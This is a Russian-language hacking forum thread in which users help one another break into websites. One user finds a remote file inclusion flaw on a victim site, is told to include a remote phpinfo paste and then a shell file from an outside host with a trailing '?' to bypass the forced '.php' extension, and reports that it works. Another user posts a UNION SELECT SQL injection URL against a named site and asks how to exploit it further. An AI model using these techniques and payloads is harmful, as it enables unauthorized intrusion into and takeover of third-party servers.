Добрый вечер. нашёл на сайте RFI. но есть одно НО.

к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:

"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."

как видите сервер добавляет обязательное расширение ".php".

вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?

если действительно rfi, то подставь вот эту ссылку http://hastebin.com/raw/iwafoxapuw вместо user и посмотри выведет ли phpinfo

PHP Version 5.1.6

да, вывело

ну вот, дальше уже сам =)

а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php

Предложи ему такую ссылку:

http://elitehacker.ru/shell.txt?

(с вопросом на конце)

есле помог жми +

не видит. этот сайт не видет даже в браузере) но за попытку спасибо

пошло-поехало! ура! действительно, всё что надо было, это поставить в конце "?". спасибо большое Ganz Euler)

Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...

Слепая ли это и как раскрутить правильно...

http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--

спасибо...